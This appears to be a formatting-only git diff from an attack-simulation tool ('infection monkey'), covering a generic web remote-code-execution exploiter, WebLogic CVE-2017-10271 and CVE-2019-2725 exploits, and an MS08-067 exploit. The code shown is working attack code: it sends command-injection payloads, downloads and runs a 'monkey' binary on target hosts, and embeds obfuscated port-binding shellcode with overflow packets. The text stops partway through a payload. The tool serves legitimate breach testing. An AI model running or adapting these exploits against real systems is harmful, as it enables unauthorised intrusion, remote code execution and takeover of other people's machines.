@@ WIN_ARCH_64 = "64" class WebRCE(HostExploiter): - def __init__(self, host, monkey_target_paths=None): """ :param host: Host that we'll attack @@ -37,9 +51,11 @@ class WebRCE(HostExploiter): if monkey_target_paths: self.monkey_target_paths = monkey_target_paths else: - self.monkey_target_paths = {'linux': self._config.dropper_target_path_linux, - 'win32': self._config.dropper_target_path_win_32, - 'win64': self._config.dropper_target_path_win_64} + self.monkey_target_paths = { + "linux": self._config.dropper_target_path_linux, + "win32": self._config.dropper_target_path_win_32, + "win64": self._config.dropper_target_path_win_64, + } self.HTTP = [str(port) for port in self._config.HTTP_PORTS] self.skip_exist = self._config.skip_exploit_if_file_exist self.vulnerable_urls = [] @@ -55,20 +71,20 @@ class WebRCE(HostExploiter): # dropper: If true monkey will use dropper parameter that will detach monkey's process and try to copy # it's file to the default destination path. - exploit_config['dropper'] = False + exploit_config["dropper"] = False # upload_commands: Unformatted dict with one or two commands {'linux': WGET_HTTP_UPLOAD,'windows': WIN_CMD} # Command must have "monkey_path" and "http_path" format parameters. If None defaults will be used. - exploit_config['upload_commands'] = None + exploit_config["upload_commands"] = None # url_extensions: What subdirectories to scan (www.domain.com[/extension]). Eg. ["home", "index.php"] - exploit_config['url_extensions'] = [] + exploit_config["url_extensions"] = [] # stop_checking_urls: If true it will stop checking vulnerable urls once one was found vulnerable. - exploit_config['stop_checking_urls'] = False + exploit_config["stop_checking_urls"] = False # blind_exploit: If true we won't check if file exist and won't try to get the architecture of target. - exploit_config['blind_exploit'] = False + exploit_config["blind_exploit"] = False return exploit_config @@ -84,8 +100,8 @@ class WebRCE(HostExploiter): if not ports: return False # Get urls to try to exploit - potential_urls = self.build_potential_urls(ports, exploit_config['url_extensions']) - self.add_vulnerable_urls(potential_urls, exploit_config['stop_checking_urls']) + potential_urls = self.build_potential_urls(ports, exploit_config["url_extensions"]) + self.add_vulnerable_urls(potential_urls, exploit_config["stop_checking_urls"]) if not self.are_vulnerable_urls_sufficient(): return False @@ -94,26 +110,37 @@ class WebRCE(HostExploiter): self.vulnerable_port = HTTPTools.get_port_from_url(self.target_url) # Skip if monkey already exists and this option is given - if not exploit_config['blind_exploit'] and self.skip_exist and self.check_remote_files(self.target_url): - LOG.info("Host %s was already infected under the current configuration, done" % self.host) + if ( + not exploit_config["blind_exploit"] + and self.skip_exist + and self.check_remote_files(self.target_url) + ): + LOG.info( + "Host %s was already infected under the current configuration, done" % self.host + ) return True # Check for targets architecture (if it's 32 or 64 bit) - if not exploit_config['blind_exploit'] and not self.set_host_arch(self.get_target_url()): + if not exploit_config["blind_exploit"] and not self.set_host_arch(self.get_target_url()): return False # Upload the right monkey to target - data = self.upload_monkey(self.get_target_url(), exploit_config['upload_commands']) + data = self.upload_monkey(self.get_target_url(), exploit_config["upload_commands"]) if data is False: return False # Change permissions to transform monkey into executable file - if self.change_permissions(self.get_target_url(), data['path']) is False: + if self.change_permissions(self.get_target_url(), data["path"]) is False: return False # Execute remote monkey - if self.execute_remote_monkey(self.get_target_url(), data['path'], exploit_config['dropper']) is False: + if ( + self.execute_remote_monkey( + self.get_target_url(), data["path"], exploit_config["dropper"] + ) + is False + ): return False return True @@ -135,15 +162,23 @@ class WebRCE(HostExploiter): :return: Returns all open ports from port list that are of service names """ candidate_services = {} - candidate_services.update({ - service: self.host.services[service] for service in self.host.services if - (self.host.services[service] and - 'name' in self.host.services[service] and - self.host.services[service]['name'] in names) - }) + candidate_services.update( + { + service: self.host.services[service] + for service in self.host.services + if ( + self.host.services[service] + and "name" in self.host.services[service] + and self.host.services[service]["name"] in names + ) + } + ) - valid_ports = [(port, candidate_services['tcp-' + str(port)]['data'][1]) for port in port_list if - tcp_port_to_service(port) in candidate_services] + valid_ports = [ + (port, candidate_services["tcp-" + str(port)]["data"][1]) + for port in port_list + if tcp_port_to_service(port) in candidate_services + ] return valid_ports @@ -156,15 +191,17 @@ class WebRCE(HostExploiter): def get_command(self, path, http_path, commands): try: - if 'linux' in self.host.os['type']: - command = commands['linux'] + if "linux" in self.host.os["type"]: + command = commands["linux"] else: - command = commands['windows'] + command = commands["windows"] # Format command - command = command % {'monkey_path': path, 'http_path': http_path} + command = command % {"monkey_path": path, "http_path": http_path} except KeyError: - LOG.error("Provided command is missing/bad for this type of host! " - "Check upload_monkey function docs before using custom monkey's upload commands.") + LOG.error( + "Provided command is missing/bad for this type of host! " + "Check upload_monkey function docs before using custom monkey's upload commands." + ) return False return command @@ -196,7 +233,7 @@ class WebRCE(HostExploiter): """ url_list = [] if extensions: - extensions = [(e[1:] if '/' == e[0] else e) for e in extensions] + extensions = [(e[1:] if "/" == e[0] else e) for e in extensions] else: extensions = [""] for port in ports: @@ -205,7 +242,9 @@ class WebRCE(HostExploiter): protocol = "https" else: protocol = "http" - url_list.append(join(("%s://%s:%s" % (protocol, self.host.ip_addr, port[0])), extension)) + url_list.append( + join(("%s://%s:%s" % (protocol, self.host.ip_addr, port[0])), extension) + ) if not url_list: LOG.info("No attack url's were built") return url_list @@ -231,11 +270,11 @@ class WebRCE(HostExploiter): :param url: Url for exploiter to use :return: Machine architecture string or false. Eg. 'i686', '64', 'x86_64', ... """ - if 'linux' in self.host.os['type']: + if "linux" in self.host.os["type"]: resp = self.exploit(url, GET_ARCH_LINUX) if resp: # Pulls architecture string - arch = re.search(r'(?<=Architecture:)\s+(\w+)', resp) + arch = re.search(r"(?<=Architecture:)\s+(\w+)", resp) try: arch = arch.group(1) except AttributeError: @@ -261,10 +300,13 @@ class WebRCE(HostExploiter): def check_remote_monkey_file(self, url, path): command = LOOK_FOR_FILE % path resp = self.exploit(url, command) - if 'No such file' in resp: + if "No such file" in resp: return False else: - LOG.info("Host %s was already infected under the current configuration, done" % str(self.host)) + LOG.info( + "Host %s was already infected under the current configuration, done" + % str(self.host) + ) return True def check_remote_files(self, url): @@ -273,10 +315,10 @@ class WebRCE(HostExploiter): :return: True if at least one file is found, False otherwise """ paths = [] - if 'linux' in self.host.os['type']: - paths.append(self.monkey_target_paths['linux']) + if "linux" in self.host.os["type"]: + paths.append(self.monkey_target_paths["linux"]) else: - paths.extend([self.monkey_target_paths['win32'], self.monkey_target_paths['win64']]) + paths.extend([self.monkey_target_paths["win32"], self.monkey_target_paths["win64"]]) for path in paths: if self.check_remote_monkey_file(url, path): return True @@ -303,7 +345,7 @@ class WebRCE(HostExploiter): LOG.error("Couldn't get host machine's architecture") return False else: - self.host.os['machine'] = arch + self.host.os["machine"] = arch return True def run_backup_commands(self, resp, url, dest_path, http_path): @@ -317,7 +359,10 @@ class WebRCE(HostExploiter): """ if not isinstance(resp, bool) and POWERSHELL_NOT_FOUND in resp: LOG.info("Powershell not found in host. Using bitsadmin to download.") - backup_command = BITSADMIN_CMDLINE_HTTP % {'monkey_path': dest_path, 'http_path': http_path} + backup_command = BITSADMIN_CMDLINE_HTTP % { + "monkey_path": dest_path, + "http_path": http_path, + } T1197Telem(ScanStatus.USED, self.host, BITS_UPLOAD_STRING).send() resp = self.exploit(url, backup_command) return resp @@ -330,25 +375,25 @@ class WebRCE(HostExploiter): :return: {'response': response/False, 'path': monkeys_path_in_host} """ LOG.info("Trying to upload monkey to the host.") - if not self.host.os['type']: + if not self.host.os["type"]: LOG.error("Unknown target's os type. Skipping.") return False paths = self.get_monkey_paths() if not paths: return False # Create server for http download and wait for it's startup. - http_path, http_thread = HTTPTools.create_locked_transfer(self.host, paths['src_path']) + http_path, http_thread = HTTPTools.create_locked_transfer(self.host, paths["src_path"]) if not http_path: LOG.debug("Exploiter failed, http transfer creation failed.") return False LOG.info("Started http server on %s", http_path) # Choose command: if not commands: - commands = {'windows': POWERSHELL_HTTP_UPLOAD, 'linux': WGET_HTTP_UPLOAD} - command = self.get_command(paths['dest_path'], http_path, commands) + commands = {"windows": POWERSHELL_HTTP_UPLOAD, "linux": WGET_HTTP_UPLOAD} + command = self.get_command(paths["dest_path"], http_path, commands) resp = self.exploit(url, command) self.add_executed_cmd(command) - resp = self.run_backup_commands(resp, url, paths['dest_path'], http_path) + resp = self.run_backup_commands(resp, url, paths["dest_path"], http_path) http_thread.join(DOWNLOAD_TIMEOUT) http_thread.stop() @@ -357,7 +402,7 @@ class WebRCE(HostExploiter): if resp is False: return resp else: - return {'response': resp, 'path': paths['dest_path']} + return {"response": resp, "path": paths["dest_path"]} def change_permissions(self, url, path, command=None): """ @@ -368,11 +413,11 @@ class WebRCE(HostExploiter): :return: response, False if failed and True if permission change is not needed """ LOG.info("Changing monkey's permissions") - if 'windows' in self.host.os['type']: + if "windows" in self.host.os["type"]: LOG.info("Permission change not required for windows") return True if not command: - command = CHMOD_MONKEY % {'monkey_path': path} + command = CHMOD_MONKEY % {"monkey_path": path} try: resp = self.exploit(url, command) T1222Telem(ScanStatus.USED, command, self.host).send() @@ -385,11 +430,13 @@ class WebRCE(HostExploiter): LOG.info("Permission change finished") return resp # If exploiter returns command output, we can check for execution errors - if 'Operation not permitted' in resp: + if "Operation not permitted" in resp: LOG.error("Missing permissions to make monkey executable") return False - elif 'No such file or directory' in resp: - LOG.error("Could not change permission because monkey was not found. Check path parameter.") + elif "No such file or directory" in resp: + LOG.error( + "Could not change permission because monkey was not found. Check path parameter." + ) return False LOG.info("Permission change finished") return resp @@ -409,16 +456,23 @@ class WebRCE(HostExploiter): default_path = self.get_default_dropper_path() if default_path is False: return False - monkey_cmd = build_monkey_commandline(self.host, - get_monkey_depth() - 1, - self.vulnerable_port, - default_path) - command = RUN_MONKEY % {'monkey_path': path, 'monkey_type': DROPPER_ARG, 'parameters': monkey_cmd} + monkey_cmd = build_monkey_commandline( + self.host, get_monkey_depth() - 1, self.vulnerable_port, default_path + ) + command = RUN_MONKEY % { + "monkey_path": path, + "monkey_type": DROPPER_ARG, + "parameters": monkey_cmd, + } else: - monkey_cmd = build_monkey_commandline(self.host, - get_monkey_depth() - 1, - self.vulnerable_port) - command = RUN_MONKEY % {'monkey_path': path, 'monkey_type': MONKEY_ARG, 'parameters': monkey_cmd} + monkey_cmd = build_monkey_commandline( + self.host, get_monkey_depth() - 1, self.vulnerable_port + ) + command = RUN_MONKEY % { + "monkey_path": path, + "monkey_type": MONKEY_ARG, + "parameters": monkey_cmd, + } try: LOG.info("Trying to execute monkey using command: {}".format(command)) resp = self.exploit(url, command) @@ -428,10 +482,10 @@ class WebRCE(HostExploiter): self.add_executed_cmd(command) return resp # If exploiter returns command output, we can check for execution errors - if 'is not recognized' in resp or 'command not found' in resp: + if "is not recognized" in resp or "command not found" in resp: LOG.error("Wrong path chosen or other process already deleted monkey") return False - elif 'The system cannot execute' in resp: + elif "The system cannot execute" in resp: LOG.error("System could not execute monkey") return False except Exception as e: @@ -448,23 +502,29 @@ class WebRCE(HostExploiter): :param url_to_monkey: Hosted monkey's url. egz : http://localserver:9999/monkey/windows-32.exe :return: Corresponding monkey path from self.monkey_target_paths """ - if not url_to_monkey or ('linux' not in url_to_monkey and 'windows' not in url_to_monkey): - LOG.error("Can't get destination path because source path %s is invalid.", url_to_monkey) + if not url_to_monkey or ("linux" not in url_to_monkey and "windows" not in url_to_monkey): + LOG.error( + "Can't get destination path because source path %s is invalid.", url_to_monkey + ) return False try: - if 'linux' in url_to_monkey: - return self.monkey_target_paths['linux'] - elif 'windows-32' in url_to_monkey: - return self.monkey_target_paths['win32'] - elif 'windows-64' in url_to_monkey: - return self.monkey_target_paths['win64'] + if "linux" in url_to_monkey: + return self.monkey_target_paths["linux"] + elif "windows-32" in url_to_monkey: + return self.monkey_target_paths["win32"] + elif "windows-64" in url_to_monkey: + return self.monkey_target_paths["win64"] else: - LOG.error("Could not figure out what type of monkey server was trying to upload, " - "thus destination path can not be chosen.") + LOG.error( + "Could not figure out what type of monkey server was trying to upload, " + "thus destination path can not be chosen." + ) return False except KeyError: - LOG.error("Unknown key was found. Please use \"linux\", \"win32\" and \"win64\" keys to initialize " - "custom dict of monkey's destination paths") + LOG.error( + 'Unknown key was found. Please use "linux", "win32" and "win64" keys to initialize ' + "custom dict of monkey's destination paths" + ) return False def get_monkey_paths(self): @@ -480,7 +540,7 @@ class WebRCE(HostExploiter): dest_path = self.get_monkey_upload_path(src_path) if not dest_path: return False - return {'src_path': src_path, 'dest_path': dest_path} + return {"src_path": src_path, "dest_path": dest_path} def get_default_dropper_path(self): """ @@ -488,14 +548,16 @@ class WebRCE(HostExploiter): :return: Default monkey's destination path for corresponding host or False if failed. E.g. config.dropper_target_path_linux(/tmp/monkey.sh) for linux host """ - if not self.host.os.get('type') or (self.host.os['type'] != 'linux' and self.host.os['type'] != 'windows'): + if not self.host.os.get("type") or ( + self.host.os["type"] != "linux" and self.host.os["type"] != "windows" + ): LOG.error("Target's OS was either unidentified or not supported. Aborting") return False - if self.host.os['type'] == 'linux': + if self.host.os["type"] == "linux": return self._config.dropper_target_path_linux - if self.host.os['type'] == 'windows': + if self.host.os["type"] == "windows": try: - if self.host.os['machine'] == WIN_ARCH_64: + if self.host.os["machine"] == WIN_ARCH_64: return self._config.dropper_target_path_win_64 except KeyError: LOG.debug("Target's machine type was not set. Using win-32 dropper path.") diff --git a/monkey/infection_monkey/exploit/weblogic.py b/monkey/infection_monkey/exploit/weblogic.py index 00b62d3d6..2d1a40c0a 100644 --- a/monkey/infection_monkey/exploit/weblogic.py +++ b/monkey/infection_monkey/exploit/weblogic.py @@ -26,13 +26,13 @@ EXECUTION_TIMEOUT = 15 HEADERS = { "Content-Type": "text/xml;charset=UTF-8", "User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_6) " - "AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.84 Safari/537.36" + "AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.84 Safari/537.36", } class WebLogicExploiter(HostExploiter): - _TARGET_OS_TYPE = ['linux', 'windows'] - _EXPLOITED_SERVICE = 'Weblogic' + _TARGET_OS_TYPE = ["linux", "windows"] + _EXPLOITED_SERVICE = "Weblogic" def _exploit_host(self): exploiters = [WebLogic20192725, WebLogic201710271] @@ -49,37 +49,43 @@ class WebLogicExploiter(HostExploiter): # https://github.com/Luffin/CVE-2017-10271 # CVE: CVE-2017-10271 class WebLogic201710271(WebRCE): - URLS = ["/wls-wsat/CoordinatorPortType", - "/wls-wsat/CoordinatorPortType11", - "/wls-wsat/ParticipantPortType", - "/wls-wsat/ParticipantPortType11", - "/wls-wsat/RegistrationPortTypeRPC", - "/wls-wsat/RegistrationPortTypeRPC11", - "/wls-wsat/RegistrationRequesterPortType", - "/wls-wsat/RegistrationRequesterPortType11"] + URLS = [ + "/wls-wsat/CoordinatorPortType", + "/wls-wsat/CoordinatorPortType11", + "/wls-wsat/ParticipantPortType", + "/wls-wsat/ParticipantPortType11", + "/wls-wsat/RegistrationPortTypeRPC", + "/wls-wsat/RegistrationPortTypeRPC11", + "/wls-wsat/RegistrationRequesterPortType", + "/wls-wsat/RegistrationRequesterPortType11", + ] _TARGET_OS_TYPE = WebLogicExploiter._TARGET_OS_TYPE _EXPLOITED_SERVICE = WebLogicExploiter._EXPLOITED_SERVICE def __init__(self, host): - super(WebLogic201710271, self).__init__(host, {'linux': '/tmp/monkey.sh', - 'win32': 'monkey32.exe', - 'win64': 'monkey64.exe'}) + super(WebLogic201710271, self).__init__( + host, {"linux": "/tmp/monkey.sh", "win32": "monkey32.exe", "win64": "monkey64.exe"} + ) def get_exploit_config(self): exploit_config = super(WebLogic201710271, self).get_exploit_config() - exploit_config['blind_exploit'] = True - exploit_config['stop_checking_urls'] = True - exploit_config['url_extensions'] = WebLogic201710271.URLS + exploit_config["blind_exploit"] = True + exploit_config["stop_checking_urls"] = True + exploit_config["url_extensions"] = WebLogic201710271.URLS return exploit_config def exploit(self, url, command): - if 'linux' in self.host.os['type']: - payload = self.get_exploit_payload('/bin/sh', '-c', command + ' 1> /dev/null 2> /dev/null') + if "linux" in self.host.os["type"]: + payload = self.get_exploit_payload( + "/bin/sh", "-c", command + " 1> /dev/null 2> /dev/null" + ) else: - payload = self.get_exploit_payload('cmd', '/c', command + ' 1> NUL 2> NUL') + payload = self.get_exploit_payload("cmd", "/c", command + " 1> NUL 2> NUL") try: - post(url, data=payload, headers=HEADERS, timeout=EXECUTION_TIMEOUT, verify=False) # noqa: DUO123 + post( + url, data=payload, headers=HEADERS, timeout=EXECUTION_TIMEOUT, verify=False + ) # noqa: DUO123 except Exception as e: LOG.error("Connection error: %s" % e) return False @@ -106,7 +112,7 @@ class WebLogic201710271(WebRCE): if httpd.get_requests > 0: # Add all urls because we don't know which one is vulnerable self.vulnerable_urls.extend(urls) - self.exploit_info['vulnerable_urls'] = self.vulnerable_urls + self.exploit_info["vulnerable_urls"] = self.vulnerable_urls else: LOG.info("No vulnerable urls found, skipping.") @@ -115,7 +121,9 @@ class WebLogic201710271(WebRCE): def check_if_exploitable_weblogic(self, url, httpd): payload = self.get_test_payload(ip=httpd.local_ip, port=httpd.local_port) try: - post(url, data=payload, headers=HEADERS, timeout=REQUEST_DELAY, verify=False) # noqa: DUO123 + post( + url, data=payload, headers=HEADERS, timeout=REQUEST_DELAY, verify=False + ) # noqa: DUO123 except exceptions.ReadTimeout: # Our request will not get response thus we get ReadTimeout error pass @@ -152,7 +160,7 @@ class WebLogic201710271(WebRCE): :param command: command itself :return: Formatted payload """ - empty_payload = ''' + empty_payload = """ @@ -175,7 +183,7 @@ class WebLogic201710271(WebRCE): - ''' + """ payload = empty_payload.format(cmd_base=cmd_base, cmd_opt=cmd_opt, cmd_payload=command) return payload @@ -187,7 +195,7 @@ class WebLogic201710271(WebRCE): :param port: Server's port :return: Formatted payload """ - generic_check_payload = ''' + generic_check_payload = """ @@ -202,7 +210,7 @@ class WebLogic201710271(WebRCE): - ''' + """ payload = generic_check_payload.format(host=ip, port=port) return payload @@ -226,10 +234,10 @@ class WebLogic201710271(WebRCE): class S(BaseHTTPRequestHandler): @staticmethod def do_GET(): - LOG.info('Server received a request from vulnerable machine') + LOG.info("Server received a request from vulnerable machine") self.get_requests += 1 - LOG.info('Server waiting for exploited machine request...') + LOG.info("Server waiting for exploited machine request...") httpd = HTTPServer((self.local_ip, self.local_port), S) httpd.daemon = True self.lock.release() @@ -258,9 +266,9 @@ class WebLogic20192725(WebRCE): def get_exploit_config(self): exploit_config = super(WebLogic20192725, self).get_exploit_config() - exploit_config['url_extensions'] = WebLogic20192725.URLS - exploit_config['blind_exploit'] = True - exploit_config['dropper'] = True + exploit_config["url_extensions"] = WebLogic20192725.URLS + exploit_config["blind_exploit"] = True + exploit_config["dropper"] = True return exploit_config def execute_remote_monkey(self, url, path, dropper=False): @@ -269,10 +277,10 @@ class WebLogic20192725(WebRCE): super(WebLogic20192725, self).execute_remote_monkey(url, path, dropper) def exploit(self, url, command): - if 'linux' in self.host.os['type']: - payload = self.get_exploit_payload('/bin/sh', '-c', command) + if "linux" in self.host.os["type"]: + payload = self.get_exploit_payload("/bin/sh", "-c", command) else: - payload = self.get_exploit_payload('cmd', '/c', command) + payload = self.get_exploit_payload("cmd", "/c", command) try: resp = post(url, data=payload, headers=HEADERS, timeout=EXECUTION_TIMEOUT) return resp @@ -281,7 +289,7 @@ class WebLogic20192725(WebRCE): return False def check_if_exploitable(self, url): - headers = copy.deepcopy(HEADERS).update({'SOAPAction': ''}) + headers = copy.deepcopy(HEADERS).update({"SOAPAction": ""}) res = post(url, headers=headers, timeout=EXECUTION_TIMEOUT) if res.status_code == 500 and "env:Client" in res.text: return True @@ -297,7 +305,7 @@ class WebLogic20192725(WebRCE): :param command: command itself :return: Formatted payload """ - empty_payload = ''' + empty_payload = """ @@ -323,6 +331,6 @@ class WebLogic20192725(WebRCE): - ''' + """ payload = empty_payload.format(cmd_base=cmd_base, cmd_opt=cmd_opt, cmd_payload=command) return payload diff --git a/monkey/infection_monkey/exploit/win_ms08_067.py b/monkey/infection_monkey/exploit/win_ms08_067.py index 4a5e059b9..16b971cd8 100644 --- a/monkey/infection_monkey/exploit/win_ms08_067.py +++ b/monkey/infection_monkey/exploit/win_ms08_067.py @@ -16,7 +16,11 @@ from impacket.dcerpc.v5 import transport from common.utils.shellcode_obfuscator import clarify from infection_monkey.exploit.HostExploiter import HostExploiter -from infection_monkey.exploit.tools.helpers import build_monkey_commandline, get_monkey_depth, get_target_monkey +from infection_monkey.exploit.tools.helpers import ( + build_monkey_commandline, + get_monkey_depth, + get_target_monkey, +) from infection_monkey.exploit.tools.smb_tools import SmbTools from infection_monkey.model import DROPPER_CMDLINE_WINDOWS, MONKEY_CMDLINE_WINDOWS from infection_monkey.network.smbfinger import SMBFinger @@ -25,81 +29,85 @@ from infection_monkey.network.tools import check_tcp_port LOG = getLogger(__name__) # Portbind shellcode from metasploit; Binds port to TCP port 4444 -OBFUSCATED_SHELLCODE = (b'4\xf6kPF\xc5\x9bI,\xab\x1d' - b'\xa0\x92Y\x88\x1b$\xa0hK\x03\x0b\x0b\xcf\xe7\xff\x9f\x9d\xb6&J' - b'\xdf\x1b\xad\x1b5\xaf\x84\xed\x99\x01\'\xa8\x03\x90\x01\xec\x13' - b'\xfb\xf9!\x11\x1dc\xd9*\xb4\xd8\x9c\xf1\xb8\xb9\xa1;\x93\xc1\x8dq' - b'\xe4\xe1\xe5?%\x1a\x96\x96\xb5\x94\x19\xb5o\x0c\xdb\x89Cq\x14M\xf8' - b'\x02\xfb\xe5\x88hL\xc4\xcdd\x90\x8bc\xff\xe3\xb8z#\x174\xbd\x00J' - b'\x1c\xc1\xccM\x94\x90tm\x89N"\xd4-') +OBFUSCATED_SHELLCODE = ( + b"4\xf6kPF\xc5\x9bI,\xab\x1d" + b"\xa0\x92Y\x88\x1b$\xa0hK\x03\x0b\x0b\xcf\xe7\xff\x9f\x9d\xb6&J" + b"\xdf\x1b\xad\x1b5\xaf\x84\xed\x99\x01'\xa8\x03\x90\x01\xec\x13" + b"\xfb\xf9!\x11\x1dc\xd9*\xb4\xd8\x9c\xf1\xb8\xb9\xa1;\x93\xc1\x8dq" + b"\xe4\xe1\xe5?%\x1a\x96\x96\xb5\x94\x19\xb5o\x0c\xdb\x89Cq\x14M\xf8" + b"\x02\xfb\xe5\x88hL\xc4\xcdd\x90\x8bc\xff\xe3\xb8z#\x174\xbd\x00J" + b'\x1c\xc1\xccM\x94\x90tm\x89N"\xd4-' +) SHELLCODE = clarify(OBFUSCATED_SHELLCODE).decode() -XP_PACKET = ("\xde\xa4\x98\xc5\x08\x00\x00\x00\x00\x00\x00\x00\x08\x00\x00\x00\x41\x00\x42\x00\x43" - "\x00\x44\x00\x45\x00\x46\x00\x47\x00\x00\x00\x36\x01\x00\x00\x00\x00\x00\x00\x36\x01" - "\x00\x00\x5c\x00\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x41\x42\x43\x44\x45\x46\x47" - "\x48\x49\x4a\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x41\x42\x43\x44\x45\x46\x47\x48" - "\x49\x4a\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x41\x42\x43\x44\x45\x46\x47\x48\x49" - "\x4a\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a" - "\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x90" - "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" - "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" - "\x90\x90\x90\x90\x90\x90\x90" + SHELLCODE + "\x5c\x00\x2e\x00\x2e\x00\x5c\x00\x2e\x00" - "\x2e\x00\x5c\x00\x41\x00\x42\x00\x43\x00\x44\x00\x45\x00\x46\x00\x47\x00\x08\x04\x02" - "\x00\xc2\x17\x89\x6f\x41\x41\x41\x41\x07\xf8\x88\x6f\x41\x41\x41\x41\x41\x41\x41\x41" - "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41" - "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x90\x90\x90\x90\x90\x90\x90\x90" - "\xeb\x62\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x00\x00\xe8\x03\x00\x00\x02\x00\x00" - "\x00\x00\x00\x00\x00\x02\x00\x00\x00\x5c\x00\x00\x00\x01\x10\x00\x00\x00\x00\x00\x00") +XP_PACKET = ( + "\xde\xa4\x98\xc5\x08\x00\x00\x00\x00\x00\x00\x00\x08\x00\x00\x00\x41\x00\x42\x00\x43" + "\x00\x44\x00\x45\x00\x46\x00\x47\x00\x00\x00\x36\x01\x00\x00\x00\x00\x00\x00\x36\x01" + "\x00\x00\x5c\x00\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x41\x42\x43\x44\x45\x46\x47" + "\x48\x49\x4a\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x41\x42\x43\x44\x45\x46\x47\x48" + "\x49\x4a\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x41\x42\x43\x44\x45\x46\x47\x48\x49" + "\x4a\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a" + "\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x90" + "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" + "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" + "\x90\x90\x90\x90\x90\x90\x90" + SHELLCODE + "\x5c\x00\x2e\x00\x2e\x00\x5c\x00\x2e\x00" + "\x2e\x00\x5c\x00\x41\x00\x42\x00\x43\x00\x44\x00\x45\x00\x46\x00\x47\x00\x08\x04\x02" + "\x00\xc2\x17\x89\x6f\x41\x41\x41\x41\x07\xf8\x88\x6f\x41\x41\x41\x41\x41\x41\x41\x41" + "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41" + "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x90\x90\x90\x90\x90\x90\x90\x90" + "\xeb\x62\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x00\x00\xe8\x03\x00\x00\x02\x00\x00" + "\x00\x00\x00\x00\x00\x02\x00\x00\x00\x5c\x00\x00\x00\x01\x10\x00\x00\x00\x00\x00\x00" +) # Payload for Windows 2000 target -PAYLOAD_2000 = '\x41\x00\x5c\x00\x2e\x00\x2e\x00\x5c\x00\x2e\x00\x2e\x00\x5c\x00' -PAYLOAD_2000 += '\x41\x41\x41\x41\x41\x41\x41\x41' -PAYLOAD_2000 += '\x41\x41\x41\x41\x41\x41\x41\x41' -PAYLOAD_2000 += '\x41\x41' -PAYLOAD_2000 += '\x2f\x68\x18\x00\x8b\xc4\x66\x05\x94\x04\x8b\x00\xff\xe0' -PAYLOAD_2000 += '\x43\x43\x43\x43\x43\x43\x43\x43' -PAYLOAD_2000 += '\x43\x43\x43\x43\x43\x43\x43\x43' -PAYLOAD_2000 += '\x43\x43\x43\x43\x43\x43\x43\x43' -PAYLOAD_2000 += '\x43\x43\x43\x43\x43\x43\x43\x43' -PAYLOAD_2000 += '\x43\x43\x43\x43\x43\x43\x43\x43' -PAYLOAD_2000 += '\xeb\xcc' -PAYLOAD_2000 += '\x00\x00' +PAYLOAD_2000 = "\x41\x00\x5c\x00\x2e\x00\x2e\x00\x5c\x00\x2e\x00\x2e\x00\x5c\x00" +PAYLOAD_2000 += "\x41\x41\x41\x41\x41\x41\x41\x41" +PAYLOAD_2000 += "\x41\x41\x41\x41\x41\x41\x41\x41" +PAYLOAD_2000 += "\x41\x41" +PAYLOAD_2000 += "\x2f\x68\x18\x00\x8b\xc4\x66\x05\x94\x04\x8b\x00\xff\xe0" +PAYLOAD_2000 += "\x43\x43\x43\x43\x43\x43\x43\x43" +PAYLOAD_2000 += "\x43\x43\x43\x43\x43\x43\x43\x43" +PAYLOAD_2000 += "\x43\x43\x43\x43\x43\x43\x43\x43" +PAYLOAD_2000 += "\x43\x43\x43\x43\x43\x43\x43\x43" +PAYLOAD_2000 += "\x43\x43\x43\x43\x43\x43\x43\x43" +PAYLOAD_2000 += "\xeb\xcc" +PAYLOAD_2000 += "\x00\x00" # Payload for Windows 2003[SP2] target -PAYLOAD_2003 = '\x41\x00\x5c\x00' -PAYLOAD_2003 += '\x2e\x00\x2e\x00\x5c\x00\x2e\x00' -PAYLOAD_2003 += '\x2e\x00\x5c\x00\x0a\x32\xbb\x77' -PAYLOAD_2003 += '\x8b\xc4\x66\x05\x60\x04\x8b\x00' -PAYLOAD_2003 += '\x50\xff\xd6\xff\xe0\x42\x84\xae' -PAYLOAD_2003 += '\xbb\x77\xff\xff\xff\xff\x01\x00' -PAYLOAD_2003 += '\x01\x00\x01\x00\x01\x00\x43\x43' -PAYLOAD_2003 += '\x43\x43\x37\x48\xbb\x77\xf5\xff' -PAYLOAD_2003 += '\xff\xff\xd1\x29\xbc\x77\xf4\x75' -PAYLOAD_2003 += '\xbd\x77\x44\x44\x44\x44\x9e\xf5' -PAYLOAD_2003 += '\xbb\x77\x54\x13\xbf\x77\x37\xc6' -PAYLOAD_2003 += '\xba\x77\xf9\x75\xbd\x77\x00\x00' +PAYLOAD_2003 = "\x41\x00\x5c\x00" +PAYLOAD_2003 += "\x2e\x00\x2e\x00\x5c\x00\x2e\x00" +PAYLOAD_2003 += 